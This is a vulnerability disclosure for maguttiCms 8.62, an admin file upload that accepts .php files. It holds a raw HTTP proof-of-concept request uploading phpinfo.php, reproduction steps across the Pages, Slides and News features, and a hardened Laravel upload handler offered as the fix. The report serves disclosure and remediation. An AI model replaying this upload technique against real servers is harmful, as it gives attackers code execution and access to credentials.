Unrestricted Upload of File with Dangerous Type in marcoax/magutticms
Reported on
Oct 25th 2021
Description
RCE via 'upload file image or document': maguttiCms 8.62 lets a remote authenticated administrator upload a file with a .php extension through the shared image/document upload handler and then execute arbitrary PHP code by requesting that file from the web-served media directory.
Proof of Concept
// PoC.req
POST /admin/api/uploadifiveSingle HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------289373597033088154093484704035
Content-Length: 1123
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/admin/edit/articles/2
Cookie: CRM-a065912273e9ce1828ca92e192338d12=hl8kmfm92bf9ducncp1qro5ibo; PHPSESSID=rooedmi2ipb8qpu8mie54h0g6r; install_f528764d624d=d7sr8hakotuhjg37mg4spnjghv; _hjid=2f0f1c3b-7bed-4258-933b-ff637ebfdec0; __hstc=19301799.95f1db85f7fcdf6d34a1f1b99da598b0.1634716071331.1634716071331.1634716071331.1; hubspotutk=95f1db85f7fcdf6d34a1f1b99da598b0; __hssrc=1; ajs_anonymous_id=7365ff25-af33-4fe1-9758-7e557b70493a; __utma=96992031.1997153298.1634716441.1634716441.1634716441.1; __utmc=96992031; __utmz=96992031.1634716441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionid=356kck05s8r7pcu3pgonp32stq; XSRF-TOKEN=eyJpdiI6IjZuRlhoUWowM3lsNFBxSkN4MlduZ1E9PSIsInZhbHVlIjoia1VXUmZ3cmlyQ1NsRjlDK243VDhTZlphRkV0bW55K001Uk5QLytNY2p6TFdmZmw5a091K2s0OVE1aTk3VFRWUVM0Z2hWNFpURnRWU20wb1VKSUNkaGFQWmRyRTQyeDJFMGFVYXdZdlRialBuUW44MVJ2aWJXbGlFeVJOSWh4V0ciLCJtYWMiOiJjNTlmYmNmNjlkMGYxY2NjMzIxNjg1MGYxNjZiODEyOTQyMzZhZGVjNTdkOWI0OWRkMTRmMjZjZjcwMzUwYjI5IiwidGFnIjoiIn0%3D; magutticms_session=eyJpdiI6Im4wS0huUmJaZWVtb0Rxd2tPOEZPdnc9PSIsInZhbHVlIjoieE95SmNUL1dEcGk1SUMzeXpDVWcrS2tpN2tQN3NXL1ZhbzlnaEloNzlOUThIelJuSzVsekY5V2ZXWE9YS0lMZU5SdGdRcDhma2owWlNkRWpZdjZuVkZMd1E5NTFINUpUU1ZxWTNxUlZwQUwxajB6R2E4NkZaL1c3WWU0ZVc0R0EiLCJtYWMiOiIzNWQyNDg5ZDEyYmEzZGM3NDBlMTYwZDEzOGU0MzBlZTVhZmQzZDc3Njc0ZmI0MmQxM2U5Y2VmOWMzZjJiNDY3IiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php"
Content-Type: text/php

<?php echo phpinfo(); ?>
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="timestamp"

1451682058
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="token"

4b9fe8f26d865150e4b26b2a839d4f2b
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="Id"

2
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="myImgType"


-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="model"

Article
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="key"

doc
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="_token"

ZvErjYb1Qmxp84MY7btjvjnYjryEFe8SuyEReMgo
-----------------------------289373597033088154093484704035--
Steps to Reproduce
Log in to the admin panel
Pages
Go to Pages and choose Create page
In the Image or Document field, upload a file such as phpinfo.php
OR
Choose Edit on an existing page
In the Media tab, upload a file such as phpinfo.php
Access the file at: https://domain/media/docs/xxxx-phpinfo.php
or https://domain/media/image/xxxx-phpinfo.php
Slides
Go to Slides and choose Create slide
In the Image field, upload a file such as phpinfo.php
Access the file at: https://domain/media/image/xxxx-phpinfo.php
News
Go to News and choose Create new
In the Image (File Manager) field, upload a file such as phpinfo.php
OR
In the Document field, upload a file such as phpinfo.php
Access the file at: https://domain/media/docs/xxxx-phpinfo.php
How to find the file name
Once the item is saved, the stored file name is returned in the upload response; alternatively, open the page source in the browser and read the file name from the media link.
Note
Because every feature listed above goes through the same image and document upload handler, the permalink in this report points only to that handler rather than to each feature separately.
Impact
An authenticated administrator, or an attacker who obtains an admin session, can upload a PHP file and execute it with the privileges of the web server account. That gives arbitrary code execution on the host, access to the application's configuration and database credentials, and a foothold for further attacks on the server and the surrounding network.
Recommendation
Validate uploads on the server before storing them: check the extension against an allow-list of the image and document types the feature actually needs, check the MIME type from the file contents rather than from the client-supplied Content-Type, and store the file under a server-generated name instead of the original one. Laravel's validation rules (for example the file, image, mimes and mimetypes rules) cover the first two checks. As defence in depth, configure the web server so that nothing under the media directory is ever handed to the PHP interpreter.
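The following is an added example, not code from maguttiCms: a Laravel controller that applies the checks above to an endpoint shaped like /admin/api/uploadifiveSingle, consuming the same Filedata and key fields the PoC sends. The controller name, the 'media' storage disk and the image/docs directory names are assumptions chosen to mirror the URLs in this report.

```php
<?php
// Added example (not maguttiCms code): a hardened upload handler.
// Assumptions: a Laravel app with a filesystem disk named "media" whose
// root is served at /media, and subdirectories "image" and "docs".

namespace App\Http\Controllers\Admin;

use Illuminate\Http\Request;
use Illuminate\Http\UploadedFile;
use Illuminate\Support\Str;

class MediaUploadController
{
    /** Allow-list keyed by the "key" field the client sends (image or doc). */
    private const ALLOWED = [
        'image' => ['jpg', 'jpeg', 'png', 'gif', 'webp'],
        'doc'   => ['pdf', 'doc', 'docx', 'xls', 'xlsx'],
    ];

    public function upload(Request $request)
    {
        // Anything that is not explicitly an image is treated as a document.
        $kind       = $request->input('key') === 'image' ? 'image' : 'doc';
        $extensions = self::ALLOWED[$kind];

        // 1. Server-side validation. The "mimes" rule matches the extension
        //    guessed from the file *contents* against the allow-list, so the
        //    client-supplied name "phpinfo.php" and Content-Type "text/php"
        //    play no part in the decision. "max" is in kilobytes.
        $request->validate([
            'Filedata' => ['required', 'file', 'mimes:' . implode(',', $extensions), 'max:10240'],
        ]);

        /** @var UploadedFile $file */
        $file = $request->file('Filedata');

        // 2. Derive the extension from the detected MIME type and check it a
        //    second time; never reuse the extension from the original name.
        $ext = strtolower((string) $file->guessExtension());
        if (!in_array($ext, $extensions, true)) {
            abort(422, 'File type not allowed');
        }

        // 3. Store under a random server-generated name so that names such as
        //    "shell.php" or "shell.php.jpg" never reach the filesystem.
        $name = Str::random(40) . '.' . $ext;
        $dir  = $kind === 'image' ? 'image' : 'docs';
        $path = $file->storeAs($dir, $name, 'media');

        // Return the stored name so the editor can reference the file.
        return response()->json(['file' => basename($path)]);
    }
}
```

With this handler the PoC request above fails validation with a 422 response: a body that starts with <?php does not match any allow-listed image or document type, and even a file that did pass would be written under a random name with a non-PHP extension. Pair it with a web server rule that refuses to execute PHP under /media, so a future bypass of the validation still cannot turn an upload into code execution.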